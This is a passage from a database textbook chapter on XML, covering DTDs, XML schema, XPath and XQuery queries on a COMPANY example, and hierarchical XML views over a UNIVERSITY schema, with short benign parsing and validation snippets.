ments are identified in a document by their start tag and end tag. The tag names are
enclosed between angled brackets < ... >, and end tags are further identified by a
slash preceding the tag name.5

4SGML (Standard Generalized Markup Language) is a more general language for describing documents
and provides capabilities for specifying new tags. However, it is more complex than HTML and XML.
5The left and right angled bracket characters (< and >) are reserved characters, as are the ampersand
(&), the apostrophe (’), and the quotation mark (“). To include them within the text of a document, they
must be encoded with the escapes &lt;, &gt;, &amp;, &apos;, and &quot;, respectively.


Figure 3
A complex XML element called <Projects>, containing two nested Project elements
(ProductX and ProductY); each Project carries its name, number, location, and
department number, together with nested worker entries giving an Ssn, hours, and
in some cases a name.

Complex elements are constructed from other elements hierarchically, whereas
simple elements contain data values. A major difference between XML and HTML
is that XML tag names are defined to describe the meaning of the data elements in
the document, rather than to describe how the text is to be displayed. This makes it
possible to process the data elements in the XML document automatically by com-
puter programs. Also, the XML tag (element) names can be defined in another doc-
ument, known as the schema document, to give a semantic meaning to the tag names


that can be exchanged among multiple users. In HTML, all tag names are prede-
fined and fixed; that is why they are not extendible.

It is straightforward to see the correspondence between the XML textual representa-
tion shown in Figure 3 and the tree structure shown in Figure 1. In the tree repre-
sentation, internal nodes represent complex elements, whereas leaf nodes represent
simple elements. That is why the XML model is called a tree model or a
hierarchical model. In Figure 3, the simple elements are the ones that hold the data
values (the project's name, number, location, and department number, and each
worker's Ssn, name, and hours). The complex elements are the root element, the
Project elements nested within it, and the Worker elements nested within each
Project. In general, there is no limit on the levels of nesting of elements.
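
A short sketch of this distinction in code: the fragment below is parsed with Python's ElementTree, and each element is classified as complex or simple depending on whether it has child elements. The tag names (Name, Number, Location, Dept_no, Worker, Ssn, Hours) are assumed stand-ins for the element names used in Figure 3 and may not match their exact spelling.

# Classify every element of a small <Projects> fragment as complex or simple.
import xml.etree.ElementTree as ET

doc = """
<Projects>
  <Project>
    <Name>ProductX</Name>
    <Number>1</Number>
    <Location>Bellaire</Location>
    <Dept_no>5</Dept_no>
    <Worker><Ssn>123456789</Ssn><Hours>32.5</Hours></Worker>
  </Project>
</Projects>
"""

root = ET.fromstring(doc)
for elem in root.iter():
    kind = "complex" if len(elem) else "simple"
    value = (elem.text or "").strip()
    print(elem.tag, kind, value)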

It is possible to characterize three main types of XML documents:

■ Data-centric XML documents. These documents have many small data
items that follow a specific structure and hence may be extracted from a
structured database. They are formatted as XML documents in order to
exchange them over or display them on the Web. These usually follow a
predefined schema that defines the tag names.

■ Document-centric XML documents. These are documents with large
amounts of text, such as news articles or books. There are few or no struc-
tured data elements in these documents.

■ Hybrid XML documents. These documents may have parts that contain
structured data and other parts that are predominantly textual or unstruc-
tured. They may or may not have a predefined schema.

XML documents that do not follow a predefined schema of element names and cor-
responding tree structure are known as schemaless XML documents. It is impor-
tant to note that data-centric XML documents can be considered either as
semistructured data or as structured data as defined in Section 1. If an XML docu-
ment conforms to a predefined XML schema or DTD (see Section 3), then the doc-
ument can be considered as structured data. On the other hand, XML allows
documents that do not conform to any schema; these would be considered as
semistructured data and are schemaless XML documents. When the value of the
standalone attribute in an XML document is yes, as in the first line in Figure 3, the
document is standalone and schemaless.

XML attributes are generally used in a manner similar to how they are used in
HTML (see Figure 2), namely, to describe properties and characteristics of the ele-
ments (tags) within which they appear. It is also possible to use XML attributes to
hold the values of simple data elements; however, this is generally not recom-
mended. An exception to this rule is in cases that need to reference another element
in another part of the XML document. To do this, it is common to use attribute val-
ues in one element as the references. This resembles the concept of foreign keys in
relational databases, and is a way to get around the strict hierarchical model that the
XML tree model implies. We discuss XML attributes further in Section 3 when we
discuss XML schema and DTD.


3 XML Documents, DTD, and XML Schema

3.1 Well-Formed and Valid XML Documents
and XML DTD

In Figure 3, we saw what a simple XML document may look like. An XML docu-
ment is well formed if it follows a few conditions. In particular, it must start with an
XML declaration to indicate the version of XML being used as well as any other rel-
evant attributes, as shown in the first line in Figure 3. It must also follow the syntac-
tic guidelines of the tree data model. This means that there should be a single root
element, and every element must include a matching pair of start and end tags
within the start and end tags of the parent element. This ensures that the nested ele-
ments specify a well-formed tree structure.

A well-formed XML document is syntactically correct. This allows it to be processed
by generic processors that traverse the document and create an internal tree repre-
sentation. A standard model with an associated set of API (application program-
ming interface) functions called DOM (Document Object Model) allows programs
to manipulate the resulting tree representation corresponding to a well-formed
XML document. However, the whole document must be parsed beforehand when
using DOM in order to convert the document to that standard DOM internal data
structure representation. Another API called SAX (Simple API for XML) allows
processing of XML documents on the fly by notifying the processing program
through callbacks whenever a start or end tag is encountered. This makes it easier to
process large documents and allows for processing of so-called streaming XML
documents, where the processing program can process the tags as they are encoun-
tered. This is also known as event-based processing.
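
A minimal sketch of the event-based style, using Python's standard xml.sax module (the one-line document and its tag names are made up for the example):

# SAX-style processing: the handler is called back on every start and end tag,
# so the document is processed as a stream and no tree is built.
import xml.sax

class TagPrinter(xml.sax.ContentHandler):
    def startElement(self, name, attrs):
        print("start:", name)
    def endElement(self, name):
        print("end:  ", name)

xml.sax.parseString(
    b"<Projects><Project><Name>ProductX</Name></Project></Projects>",
    TagPrinter())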

A well-formed XML document can be schemaless; that is, it can have any tag names
for the elements within the document. In this case, there is no predefined set of ele-
ments (tag names) that a program processing the document knows to expect. This
gives the document creator the freedom to specify new elements, but limits the pos-
sibilities for automatically interpreting the meaning or semantics of the elements
within the document.

A stronger criterion is for an XML document to be valid. In this case, the document
must be well formed, and it must follow a particular schema. That is, the element
names used in the start and end tag pairs must follow the structure specified in a
separate XML DTD (Document Type Definition) file or XML schema file. We first
discuss XML DTD here, and then we give an overview of XML schema in Section
3.2. Figure 4 shows a simple XML DTD file, which specifies the elements (tag
names) and their nested structures. Any valid documents conforming to this DTD
should follow the specified structure. A special syntax exists for specifying DTD
files, as illustrated in Figure 4. First, a name is given to the root tag of the document,
which is called Projects in the first line in Figure 4. Then the elements and their
nested structure are specified.


Figure 4
An XML DTD file
called Projects.

When specifying elements, the following notation is used (a short sketch follows the list):

■ A * following the element name means that the element can be repeated zero
or more times in the document. This kind of element is known as an optional
multivalued (repeating) element.

■ A + following the element name means that the element can be repeated one
or more times in the document. This kind of element is a required multival-
ued (repeating) element.

■ A ? following the element name means that the element can be repeated zero
or one times. This kind is an optional single-valued (nonrepeating) element.

■ An element appearing without any of the preceding three symbols must
appear exactly once in the document. This kind is a required single-valued
(nonrepeating) element.

■ The type of the element is specified via parentheses following the element. If
the parentheses include names of other elements, these latter elements are
the children of the element in the tree structure. If the parentheses include
the keyword #PCDATA or one of the other data types available in XML DTD,
the element is a leaf node. PCDATA stands for parsed character data, which is
roughly similar to a string data type.

■ The list of attributes that can appear within an element can also be specified
via the keyword !ATTLIST. In Figure 3, the Project element has an attribute
ProjId. If the type of an attribute is ID, then it can be referenced from another
attribute whose type is IDREF within another element. Notice that attributes
can also be used to hold the values of simple data elements of type #PCDATA.

■ Parentheses can be nested when specifying elements.
■ A bar symbol ( e1 | e2 ) specifies that either e1 or e2 can appear in the docu-

ment.
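
The sketch below illustrates this notation using the third-party lxml library; the element and attribute declarations are assumptions written in the spirit of the Projects DTD and need not match Figure 4 exactly.

# Validate a small document against a DTD that uses +, ?, *, |, #PCDATA, and !ATTLIST.
from io import StringIO
from lxml import etree

dtd = etree.DTD(StringIO("""
<!ELEMENT Projects (Project+)>
<!ELEMENT Project  (Name, Number, Location, Dept_no?, Worker*)>
<!ATTLIST Project  ProjId ID #REQUIRED>
<!ELEMENT Name     (#PCDATA)>
<!ELEMENT Number   (#PCDATA)>
<!ELEMENT Location (#PCDATA)>
<!ELEMENT Dept_no  (#PCDATA)>
<!ELEMENT Worker   (Ssn, (Last_name | First_name)?, Hours)>
<!ELEMENT Ssn      (#PCDATA)>
<!ELEMENT Last_name  (#PCDATA)>
<!ELEMENT First_name (#PCDATA)>
<!ELEMENT Hours    (#PCDATA)>
"""))

doc = etree.XML(
    "<Projects><Project ProjId='P1'>"
    "<Name>ProductX</Name><Number>1</Number><Location>Bellaire</Location>"
    "<Worker><Ssn>123456789</Ssn><Hours>32.5</Hours></Worker>"
    "</Project></Projects>")
print(dtd.validate(doc))   # True: the document conforms to the DTD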



We can see that the tree structure in Figure 1 and the XML document in Figure 3
conform to the XML DTD in Figure 4. To require that an XML document be
checked for conformance to a DTD, we must specify this in the declaration of the
document. For example, we could change the first line in Figure 3 to the
following:

<?xml version = "1.0" standalone = "no"?>
When the value of the standalone attribute in an XML document is “no”, the docu-
ment needs to be checked against a separate DTD document or XML schema docu-
ment (see below). The DTD file shown in Figure 4 should be stored in the same file
system as the XML document, and should be given the file name proj.dtd.
Alternatively, we could include the DTD document text at the beginning of the
XML document itself to allow the checking.

Although XML DTD is quite adequate for specifying tree structures with required,
optional, and repeating elements, and with various types of attributes, it has several
limitations. First, the data types in DTD are not very general. Second, DTD has its
own special syntax and thus requires specialized processors. It would be advanta-
geous to specify XML schema documents using the syntax rules of XML itself so
that the same processors used for XML documents could process XML schema
descriptions. Third, all DTD elements are always forced to follow the specified
ordering of the document, so unordered elements are not permitted. These draw-
backs led to the development of XML schema, a more general but also more com-
plex language for specifying the structure and elements of XML documents.

3.2 XML Schema
The XML schema language is a standard for specifying the structure of XML docu-
ments. It uses the same syntax rules as regular XML documents, so that the same
processors can be used on both. To distinguish the two types of documents, we will
use the term XML instance document or XML document for a regular XML docu-
ment, and XML schema document for a document that specifies an XML schema.
Figure 5 shows an XML schema document corresponding to the COMPANY data-
base shown in Figures A.2 and A.3. Although it is unlikely that we would want to
display the whole database as a single document, there have been proposals to store
data in native XML format as an alternative to storing the data in relational data-
bases. The schema in Figure 5 would serve the purpose of specifying the structure of
the COMPANY database if it were stored in a native XML system. We discuss this
topic further in Section 4.

As with XML DTD, XML schema is based on the tree data model, with elements and
attributes as the main structuring concepts. However, it borrows additional concepts
from database and object models, such as keys, references, and identifiers. Here we
describe the features of XML schema in a step-by-step manner, referring to the sam-
ple XML schema document in Figure 5 for illustration. We introduce and describe
some of the schema concepts in the order in which they are used in Figure 5.


Figure 5
An XML schema file called company. The schema document begins with the annotation
"Company Schema (Element Approach) – Prepared by Babak Hojabri".

1. Schema descriptions and XML namespaces. It is necessary to identify the
specific set of XML schema language elements (tags) being used by specify-
ing a file stored at a Web site location. The second line in Figure 5 specifies


the file used in this example, which is http://www.w3.org/2001/XMLSchema.
This is a commonly used standard for XML schema commands. Each such
definition is called an XML namespace, because it defines the set of com-
mands (names) that can be used. The file name is assigned to the variable xsd
(XML schema description) using the attribute xmlns (XML namespace), and
this variable is used as a prefix to all XML schema commands (tag names).
For example, in Figure 5, when we write xsd:element or xsd:sequence, we are
referring to the definitions of the element and sequence tags as defined in the
file http://www.w3.org/2001/XMLSchema.

2. Annotations, documentation, and language used. The next couple of lines
in Figure 5 illustrate the XML schema elements (tags) xsd:annotation and
xsd:documentation, which are used for providing comments and other
descriptions in the XML document. The attribute xml:lang of the
xsd:documentation element specifies the language being used, where en stands
for the English language.

3. Elements and types. Next, we specify the root element of our XML schema.
In XML schema, the name attribute of the xsd:element tag specifies the ele-
ment name, which is called company for the root element in our example (see
Figure 5). The structure of the company root element can then be specified,
which in our example is xsd:complexType. This is further specified to be a
sequence of departments, employees, and projects using the xsd:sequence
structure of XML schema. It is important to note here that this is not the
only way to specify an XML schema for the COMPANY database. We will dis-
cuss other options in Section 6.

4. First-level elements in the COMPANY database. Next, we specify the three
first-level elements under the company root element in Figure 5. These ele-
ments are named employee, department, and project, and each is specified in
an xsd:element tag. Notice that if a tag has only attributes and no further
subelements or data within it, it can be ended with the slash symbol (/>)
directly instead of having a separate matching end tag. These are called
empty elements; examples are the xsd:element elements named department
and project in Figure 5.

5. Specifying element type and minimum and maximum occurrences. In
XML schema, the attributes type, minOccurs, and maxOccurs in the
xsd:element tag specify the type and multiplicity of each element in any doc-
ument that conforms to the schema specifications. If we specify a type attrib-
ute in an xsd:element, the structure of the element must be described
separately, typically using the xsd:complexType element of XML schema. This
is illustrated by the employee, department, and project elements in Figure 5. On
the other hand, if no type attribute is specified, the element structure can be
defined directly following the tag, as illustrated by the company root element
in Figure 5. The minOccurs and maxOccurs attributes are used for specifying lower
and upper bounds on the number of occurrences of an element in any XML


document that conforms to the schema specifications. If they are not speci-
fied, the default is exactly one occurrence. These serve a similar role to the *,
+, and ? symbols of XML DTD.

6. Specifying keys. In XML schema, it is possible to specify constraints that
correspond to unique and primary key constraints in a relational database,
as well as foreign keys (or referential integrity) constraints. The xsd:unique
tag specifies elements that correspond to unique attributes in a relational
database. We can give each such uniqueness constraint a name, and we must
specify xsd:selector and xsd:field tags for it to identify the element type that
contains the unique element and the element name within it that is unique
via the xpath attribute. This is illustrated by the departmentNameUnique and
projectNameUnique elements in Figure 5. For specifying primary keys, the tag
xsd:key is used instead of xsd:unique, as illustrated by the projectNumberKey,
departmentNumberKey, and employeeSSNKey elements in Figure 5. For speci-
fying foreign keys, the tag xsd:keyref is used, as illustrated by the six xsd:keyref
elements in Figure 5. When specifying a foreign key, the attribute refer of the
xsd:keyref tag specifies the referenced primary key, whereas the tags
xsd:selector and xsd:field specify the referencing element type and foreign key
(see Figure 5).

7. Specifying the structures of complex elements via complex types. The next
part of our example specifies the structures of the complex elements
Department, Employee, Project, and Dependent, using the tag xsd:complexType
(see Figure 5). We specify each of these as a sequence of subelements corre-
sponding to the database attributes of each entity type (see Figure A.4) by
using the xsd:sequence and xsd:element tags of XML schema. Each element is
given a name and type via the attributes name and type of xsd:element. We can
also specify minOccurs and maxOccurs attributes if we need to change the
default of exactly one occurrence. For (optional) database attributes where
null is allowed, we need to specify minOccurs = 0, whereas for multivalued
database attributes we need to specify maxOccurs = “unbounded” on the corre-
sponding element. Notice that if we were not going to specify any key con-
straints, we could have embedded the subelements within the parent
element definitions directly without having to specify complex types.
However, when unique, primary key, and foreign key constraints need to be
specified, we must define complex types to specify the element structures.

8. Composite (compound) attributes. Composite attributes from Figure A.3
are also specified as complex types in Figure 5, as illustrated by the Address,
Name, Worker, and WorksOn complex types. These could have been directly
embedded within their parent elements.

This example illustrates some of the main features of XML schema. There are other
features, but they are beyond the scope of our presentation. In the next section, we
discuss the different approaches to creating XML documents from relational data-
bases and storing XML documents.
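
A toy sketch of some constructs described above (xsd:element, xsd:complexType, xsd:sequence, minOccurs, maxOccurs), validated with the third-party lxml library. Only the element names employee, employeeName, and employeeSalary are taken from this chapter's examples; everything else is invented for illustration and is far smaller than the schema of Figure 5.

# Validate a tiny instance document against a tiny XML schema document.
from io import BytesIO
from lxml import etree

schema_doc = etree.parse(BytesIO(b"""
<xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <xsd:element name="company">
    <xsd:complexType>
      <xsd:sequence>
        <xsd:element name="employee" minOccurs="0" maxOccurs="unbounded">
          <xsd:complexType>
            <xsd:sequence>
              <xsd:element name="employeeName"   type="xsd:string"/>
              <xsd:element name="employeeSalary" type="xsd:decimal"/>
            </xsd:sequence>
          </xsd:complexType>
        </xsd:element>
      </xsd:sequence>
    </xsd:complexType>
  </xsd:element>
</xsd:schema>
"""))
schema = etree.XMLSchema(schema_doc)

instance = etree.parse(BytesIO(
    b"<company><employee>"
    b"<employeeName>Smith</employeeName>"
    b"<employeeSalary>30000</employeeSalary>"
    b"</employee></company>"))
print(schema.validate(instance))   # True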


4 Storing and Extracting XML Documents from
Databases

Several approaches to organizing the contents of XML documents to facilitate their
subsequent querying and retrieval have been proposed. The following are the most
common approaches:

1. Using a DBMS to store the documents as text. A relational or object DBMS
can be used to store whole XML documents as text fields within the DBMS
records or objects. This approach can be used if the DBMS has a special
module for document processing, and would work for storing schemaless
and document-centric XML documents.

2. Using a DBMS to store the document contents as data elements. This
approach would work for storing a collection of documents that follow a
specific XML DTD or XML schema. Because all the documents have the
same structure, one can design a relational (or object) database to store the
leaf-level data elements within the XML documents. This approach would
require mapping algorithms to design a database schema that is compatible
with the XML document structure as specified in the XML schema or DTD
and to recreate the XML documents from the stored data. These algorithms
can be implemented either as an internal DBMS module or as separate mid-
dleware that is not part of the DBMS.

3. Designing a specialized system for storing native XML data. A new type of
database system based on the hierarchical (tree) model could be designed
and implemented. Such systems are being called Native XML DBMSs. The
system would include specialized indexing and querying techniques, and
would work for all types of XML documents. It could also include data com-
pression techniques to reduce the size of the documents for storage. Tamino
by Software AG and the Dynamic Application Platform of eXcelon are two
popular products that offer native XML DBMS capability. Oracle also offers
a native XML storage option.

4. Creating or publishing customized XML documents from preexisting
relational databases. Because there are enormous amounts of data already
stored in relational databases, parts of this data may need to be formatted as
documents for exchanging or displaying over the Web. This approach would
use a separate middleware software layer to handle the conversions needed
between the XML documents and the relational database. Section 6 discusses
this approach, in which data-centric XML documents are extracted from
existing databases, in more detail. In particular, we show how tree structured
documents can be created from graph-structured databases. Section 6.2 dis-
cusses the problem of cycles and how to deal with it.

All of these approaches have received considerable attention. We focus on the fourth
approach in Section 6, because it gives a good conceptual understanding of the dif-
ferences between the XML tree data model and the traditional database models


based on flat files (relational model) and graph representations (ER model). But
first we give an overview of XML query languages in Section 5.

5 XML Languages
There have been several proposals for XML query languages, and two query language
standards have emerged. The first is XPath, which provides language constructs for
specifying path expressions to identify certain nodes (elements) or attributes within
an XML document that match specific patterns. The second is XQuery, which is a
more general query language. XQuery uses XPath expressions but has additional
constructs. We give an overview of each of these languages in this section. Then we
discuss some additional languages related to HTML in Section 5.3.

5.1 XPath: Specifying Path Expressions in XML
An XPath expression generally returns a sequence of items that satisfy a certain pat-
tern as specified by the expression. These items are either values (from leaf nodes)
or elements or attributes. The most common type of XPath expression returns a col-
lection of element or attribute nodes that satisfy certain patterns specified in the
expression. The names in the XPath expression are node names in the XML docu-
ment tree that are either tag (element) names or attribute names, possibly with
additional qualifier conditions to further restrict the nodes that satisfy the pattern.
Two main separators are used when specifying a path: single slash (/) and double
slash (//). A single slash before a tag specifies that the tag must appear as a direct
child of the previous (parent) tag, whereas a double slash specifies that the tag can
appear as a descendant of the previous tag at any level. Let us look at some examples
of XPath as shown in Figure 6.

The first XPath expression in Figure 6 returns the company root node and all its
descendant nodes, which means that it returns the whole XML document. We
should note that it is customary to include the file name in the XPath query. This
allows us to specify any local file name or even any path name that specifies a file on
the Web. For example, if the COMPANY XML document is stored at the location

www.company.com/info.XML

then the first XPath expression in Figure 6 can be written as

doc(www.company.com/info.XML)/company

This prefix would also be included in the other examples of XPath expressions.


Figure 6
Some examples of
XPath expressions on
XML documents that
follow the XML
schema file company
in Figure 5.

1. /company

2. /company/department

3. //employee [employeeSalary gt 70000]/employeeName

4. /company/employee [employeeSalary gt 70000]/employeeName

5. /company/project/projectWorker [hours ge 20.0]


The second example in Figure 6 returns all department nodes (elements) and their
descendant subtrees. Note that the nodes (elements) in an XML document are
ordered, so the XPath result that returns multiple nodes will do so in the same order
in which the nodes are ordered in the document tree.

The third XPath expression in Figure 6 illustrates the use of //, which is convenient
to use if we do not know the full path name we are searching for, but do know the
name of some tags of interest within the XML document. This is particularly useful
for schemaless XML documents or for documents with many nested levels of
nodes.6

The expression returns all employeeName nodes that are direct children of an
employee node, such that the employee node has another child element employeeSalary
whose value is greater than 70000. This illustrates the use of qualifier conditions,
which restrict the nodes selected by the XPath expression to those that satisfy the con-
dition. XPath has a number of comparison operations for use in qualifier conditions,
including standard arithmetic, string, and set comparison operations.

The fourth XPath expression in Figure 6 should return the same result as the previ-
ous one, except that we specified the full path name in this example. The fifth
expression in Figure 6 returns all projectWorker nodes and their descendant nodes
that are children under a path /company/project and have a child node hours with a
value greater than 20.0 hours.

When we need to include attributes in an XPath expression, the attribute name is
prefixed by the @ symbol to distinguish it from element (tag) names. It is also pos-
sible to use the wildcard symbol *, which stands for any element, as in the following
example, which retrieves all elements that are child elements of the root, regardless
of their element type. When wildcards are used, the result can be a sequence of dif-
ferent types of items.

/company/*
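
The sketch below evaluates a query in the style of the third expression of Figure 6 with Python's ElementTree. ElementTree's findall() accepts only a small subset of XPath, so the numeric qualifier condition is applied in ordinary Python; the two employees and their salaries are toy values.

# //employee [employeeSalary gt 70000] / employeeName, evaluated over toy data.
import xml.etree.ElementTree as ET

doc = ET.fromstring(
    "<company>"
    "<employee><employeeName>e1</employeeName>"
    "<employeeSalary>65000</employeeSalary></employee>"
    "<employee><employeeName>e2</employeeName>"
    "<employeeSalary>95000</employeeSalary></employee>"
    "</company>")

names = [e.findtext("employeeName")
         for e in doc.findall(".//employee")
         if float(e.findtext("employeeSalary")) > 70000]
print(names)   # ['e2']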

The examples above illustrate simple XPath expressions, where we can only move
down in the tree structure from a given node. A more general model for path
expressions has been proposed. In this model, it is possible to move in multiple
directions from the current node in the path expression. These are known as the
axes of an XPath expression. Our examples above used only three of these axes: child
of the current node (/), descendent or self at any level of the current node (//), and
attribute of the current node (@). Other axes include parent, ancestor (at any level),
previous sibling (any node at same level to the left in the tree), and next sibling (any
node at the same level to the right in the tree). These axes allow for more complex
path expressions.
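To make this concrete, the following is a minimal sketch of evaluating one of the Figure 6 expressions from a host program using the standard Java javax.xml.xpath API. The local file name company.xml is an assumption; note also that the JDK's built-in engine implements XPath 1.0, so the comparison is written with > rather than the gt keyword used in Figure 6.

import java.io.File;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;

public class XPathDemo {
    public static void main(String[] args) throws Exception {
        // Parse a local copy of the company document (the file name is an assumption).
        Document doc = DocumentBuilderFactory.newInstance()
                .newDocumentBuilder().parse(new File("company.xml"));
        XPath xpath = XPathFactory.newInstance().newXPath();
        // XPath 1.0 syntax: > instead of the gt keyword of Figure 6.
        NodeList names = (NodeList) xpath.evaluate(
                "//employee[employeeSalary > 70000]/employeeName",
                doc, XPathConstants.NODESET);
        for (int i = 0; i < names.getLength(); i++) {
            System.out.println(names.item(i).getTextContent());
        }
    }
}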

The main restriction of XPath path expressions is that the path that specifies the pat-
tern also specifies the items to be retrieved. Hence, it is difficult to specify certain
conditions on the pattern while separately specifying which result items should be

6We use the terms node, tag, and element interchangeably here.


retrieved. The XQuery language separates these two concerns, and provides more
powerful constructs for specifying queries.

5.2 XQuery: Specifying Queries in XML
XPath allows us to write expressions that select items from a tree-structured XML
document. XQuery permits the specification of more general queries on one or more
XML documents. The typical form of a query in XQuery is known as a FLWR
expression, which stands for the four main clauses of XQuery and has the following
form:

FOR
LET
WHERE
RETURN

There can be zero or more instances of the FOR clause, as well as of the LET clause in
a single XQuery. The WHERE clause is optional, but can appear at most once, and the
RETURN clause must appear exactly once. Let us illustrate these clauses with the fol-
lowing simple example of an XQuery.

LET $d := doc(www.company.com/info.xml)
FOR $x IN $d/company/project[projectNumber = 5]/projectWorker,

$y IN $d/company/employee
WHERE $x/hours gt 20.0 AND $y.ssn = $x.ssn
RETURN $y/employeeName/firstName, $y/employeeName/lastName,

$x/hours

1. Variables are prefixed with the $ sign. In the above example, $d, $x, and $y
are variables.

2. The LET clause assigns a variable to a particular expression for the rest of the
query. In this example, $d is assigned to the document file name. It is possi-
ble to have a query that refers to multiple documents by assigning multiple
variables in this way.

3. The FOR clause assigns a variable to range over each of the individual items
in a sequence. In our example, the sequences are specified by path expres-
sions. The $x variable ranges over elements that satisfy the path expression
$d/company/project[projectNumber = 5]/projectWorker. The $y variable ranges
over elements that satisfy the path expression $d/company/employee. Hence,
$x ranges over projectWorker elements, whereas $y ranges over employee ele-
ments.

4. The WHERE clause specifies additional conditions on the selection of items.
In this example, the first condition selects only those projectWorker elements
that satisfy the condition (hours gt 20.0). The second condition specifies a
join condition that combines an employee with a projectWorker only if they
have the same ssn value.

5. Finally, the RETURN clause specifies which elements or attributes should be
retrieved from the items that satisfy the query conditions. In this example, it


will return a sequence of elements, each containing the employee's first name, last name, and hours, for employees who work more than 20 hours per week on project
number 5.

Figure 7 includes some additional examples of queries in XQuery that can be speci-
fied on XML instance documents that follow the XML schema document in
Figure 5. The first query retrieves the first and last names of employees who earn
more than $70,000. The variable $x is bound to each employeeName element that is a
child of an employee element, but only for employee elements that satisfy the quali-
fier that their employeeSalary value is greater than $70,000. The result retrieves
the firstName and lastName child elements of the selected employeeName elements.
The second query is an alternative way of retrieving the same elements retrieved by
the first query.

The third query illustrates how a join operation can be performed by using more
than one variable. Here, the $x variable is bound to each projectWorker element that
is a child of project number 5, whereas the $y variable is bound to each employee ele-
ment. The join condition matches ssn values in order to retrieve the employee
names. Notice that this is an alternative way of specifying the same query in our ear-
lier example, but without the LET clause.

XQuery has very powerful constructs to specify complex queries. In particular, it can
specify universal and existential quantifiers in the conditions of a query, aggregate
functions, ordering of query results, selection based on position in a sequence, and
even conditional branching. Hence, in some ways, it qualifies as a full-fledged pro-
gramming language.

This concludes our brief introduction to XQuery. The interested reader is referred to
www.w3.org, which contains documents describing the latest standards related to
XML and XQuery. The next section briefly discusses some additional languages and
protocols related to XML.

Figure 7
Some examples of XQuery
queries on XML documents
that follow the XML schema
file company in Figure 5.

1. FOR $x IN
doc(www.company.com/info.xml)
//employee [employeeSalary gt 70000]/employeeName
RETURN $x/firstName, $x/lastName

2. FOR $x IN
doc(www.company.com/info.xml)/company/employee
WHERE $x/employeeSalary gt 70000
RETURN $x/employeeName/firstName, $x/employeeName/lastName

3. FOR $x IN
doc(www.company.com/info.xml)/company/project[projectNumber = 5]/projectWorker,
$y IN doc(www.company.com/info.xml)/company/employee
WHERE $x/hours gt 20.0 AND $y.ssn = $x.ssn
RETURN $y/employeeName/firstName, $y/employeeName/lastName, $x/hours


5.3 Other Languages and Protocols Related to XML
There are several other languages and protocols related to XML technology. The
long-term goal of these and other languages and protocols is to provide the technol-
ogy for realization of the Semantic Web, where all information in the Web can be
intelligently located and processed.

■ The Extensible Stylesheet Language (XSL) can be used to define how a doc-
ument should be rendered for display by a Web browser.

■ The Extensible Stylesheet Language for Transformations (XSLT) can be used
to transform one structure into a different structure. Hence, it can convert
documents from one form to another (see the sketch following this list).

■ The Web Services Description Language (WSDL) allows for the description
of Web Services in XML. This makes the Web Service available to users and
programs over the Web.

■ The Simple Object Access Protocol (SOAP) is a platform-independent and
programming language-independent protocol for messaging and remote
procedure calls.

■ The Resource Description Framework (RDF) provides languages and tools
for exchanging and processing of meta-data (schema) descriptions and spec-
ifications over the Web.
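As an illustration of the XSLT item above, the following minimal Java sketch applies a stylesheet to an XML document using the standard javax.xml.transform API. The file names company.xml, company.xsl, and company.html are placeholders introduced only for illustration.

import java.io.File;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

public class TransformCompany {
    public static void main(String[] args) throws Exception {
        // Compile the stylesheet (hypothetical file name).
        Transformer t = TransformerFactory.newInstance()
                .newTransformer(new StreamSource(new File("company.xsl")));
        // Apply it to the source document and write the transformed result.
        t.transform(new StreamSource(new File("company.xml")),
                    new StreamResult(new File("company.html")));
    }
}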

6 Extracting XML Documents from Relational
Databases

6.1 Creating Hierarchical XML Views over Flat
or Graph-Based Data

This section discusses the representational issues that arise when converting data
from a database system into XML documents. As we have discussed, XML uses a
hierarchical (tree) model to represent documents. The database systems with the
most widespread use follow the flat relational data model. When we add referential
integrity constraints, a relational schema can be considered to be a graph structure
(for example, see Figure A.4). Similarly, the ER model represents data using graph-
like structures (for example, see Figure A.3). There are straightforward mappings
between the ER and relational models, so we can conceptually represent a relational
database schema using the corresponding ER schema. Although we will use the ER
model in our discussion and examples to clarify the conceptual differences between
tree and graph models, the same issues apply to converting relational data to XML.

We will use the simplified UNIVERSITY ER schema shown in Figure 8 to illustrate our
discussion. Suppose that an application needs to extract XML documents for stu-
dent, course, and grade information from the UNIVERSITY database. The data
needed for these documents is contained in the database attributes of the entity


Figure 8
An ER schema diagram for a simplified UNIVERSITY database (entity types DEPARTMENT, COURSE, SECTION, STUDENT, and INSTRUCTOR; diagram not reproduced).

types COURSE, SECTION, and STUDENT from Figure 8, and the relationships
S-S and C-S between them. In general, most documents extracted from a database
will only use a subset of the attributes, entity types, and relationships in the database.
In this example, the subset of the database that is needed is shown in Figure 9.

At least three possible document hierarchies can be extracted from the database
subset in Figure 9. First, we can choose COURSE as the root, as illustrated in Figure
10. Here, each course entity has the set of its sections as subelements, and each sec-
tion has its students as subelements. We can see one consequence of modeling the
information in a hierarchical tree structure. If a student has taken multiple sections,
that student’s information will appear multiple times in the document—once
under each section. A possible simplified XML schema for this view is shown in
Figure 11. The Grade database attribute in the S-S relationship is migrated to the
STUDENT element. This is because STUDENT becomes a child of SECTION in this
hierarchy, so each STUDENT element under a specific SECTION element can have a
specific grade in that section. In this document hierarchy, a student taking more
than one section will have several replicas, one under each section, and each replica
will have the specific grade given in that particular section.


Figure 9
Subset of the UNIVERSITY database schema needed for XML document extraction (diagram not reproduced).

Figure 10
Hierarchical (tree) view with COURSE as the root (diagram not reproduced).

Figure 11
XML schema document with course as the root (schema listing not reproduced).


Figure 12
Hierarchical (tree) view with STUDENT as the root (diagram not reproduced).

Figure 11 (continued)
XML schema document with course as the root (schema listing not reproduced).
In the second hierarchical document view, we can choose STUDENT as root (Figure 12). In this hierarchi-
cal view, each student has a set of sections as its child elements, and each section is related to one course
as its child, because the relationship between SECTION and COURSE is N:1. Thus, we can merge the
COURSE and SECTION elements in this view, as shown in Figure 12. In addition, the GRADE database
attribute can be migrated to the SECTION element. In this hierarchy, the combined COURSE/SECTION
information is replicated under each student who completed the section. A possible simplified XML
schema for this view is shown in Figure 13.


Figure 13
XML schema document with student as the root (schema listing not reproduced).

Figure 14
Hierarchical (tree) view with SECTION as the root (diagram not reproduced).
The third possible way is to choose SECTION as the root, as shown in Figure 14.
Similar to the second hierarchical view, the COURSE information can be merged
into the SECTION element. The GRADE database attribute can be migrated to the
STUDENT element. As we can see, even in this simple example, there can be numer-
